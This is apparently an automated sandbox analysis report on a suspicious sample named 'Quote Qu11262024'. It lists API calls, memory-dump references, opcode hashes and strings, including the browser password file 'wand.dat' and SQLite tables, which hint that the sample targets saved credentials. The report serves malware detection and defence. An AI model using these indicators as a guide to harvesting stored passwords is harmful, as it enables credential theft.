                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memcmp
                                                                                                    • String ID:
                                                                                                    • API String ID: 3384217055-0
                                                                                                    • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                                    • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                                    • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 368790112-0
                                                                                                    • Opcode ID: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                                    • Opcode Fuzzy Hash: 8ce092fd9a5e59041eb9f85ad4e05697c1cc0ba7cb52d02734991e9cdc0d3c07
                                                                                                    • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                                    APIs
                                                                                                      • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                                                      • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                                                      • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                                                      • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                                                    • GetMenu.USER32(?), ref: 00410F8D
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                                                    • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                                                    • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                    • String ID:
                                                                                                    • API String ID: 1889144086-0
                                                                                                    • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                                                                                                    • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                                                                                                    • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                                                                                                    APIs
                                                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                                                    • GetLastError.KERNEL32 ref: 0041810A
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                    • String ID:
                                                                                                    • API String ID: 1661045500-0
                                                                                                    • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                                                                                                    • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                                                                                                    • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                                    Strings
                                                                                                    • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                                    • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                                    • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                    • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                                    • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                                    • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040560C
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                    • API String ID: 2618321458-1828844352
                                                                                                    • Opcode ID: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                    • Opcode Fuzzy Hash: 0657051124b0d036bd635f999d135efdf1f0fa3481af6b00979a6af828487765
                                                                                                    • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                      • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                    • wcslen.MSVCRT ref: 00410C74
                                                                                                    • _wtoi.MSVCRT(?,?,00000000,00000000,00000000,?,00000000), ref: 00410C80
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CCE
                                                                                                    • _wcsicmp.MSVCRT ref: 00410CDF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1549203181-0
                                                                                                    • Opcode ID: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                                                                                                    • Opcode Fuzzy Hash: ea618d40444277bd221524d3c134f5417e022d6ba5f32085407bce5ff1a0f2d9
                                                                                                    • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00412057
                                                                                                      • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,Function_0004E518,Function_0004E518,00000005), ref: 0040A12C
                                                                                                    • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                    • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                    • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3550944819-0
                                                                                                    • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                    • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                    • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                    APIs
                                                                                                    • free.MSVCRT ref: 0040F561
                                                                                                    • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$free
                                                                                                    • String ID: g4@
                                                                                                    • API String ID: 2888793982-2133833424
                                                                                                    • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                    • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                    • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                    • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                                    • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                                    • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: @
                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                    • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                                                                    • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                                                                    • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                                                    • memset.MSVCRT ref: 0040AF18
                                                                                                    • memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1865533344-0
                                                                                                    • Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                    • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                                                                                                    • Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
                                                                                                    • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 1127616056-0
                                                                                                    • Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                    • Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                                                    • memset.MSVCRT ref: 0042FED3
                                                                                                    • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: sqlite_master
                                                                                                    • API String ID: 438689982-3163232059
                                                                                                    • Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                                                                                                    • Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
                                                                                                    • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                                                                                                    APIs
                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                                                    • wcscpy.MSVCRT ref: 00414DF3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3917621476-0
                                                                                                    • Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                                                                                                    • Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 822687973-0
                                                                                                    • Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                    • Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                    APIs
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7622DF80,?,0041755F,?), ref: 00417452
                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7622DF80,?,0041755F,?), ref: 00417478
                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 2605342592-0
                                                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
                                                                                                    • RegisterClassW.USER32(00000001), ref: 00412428
                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
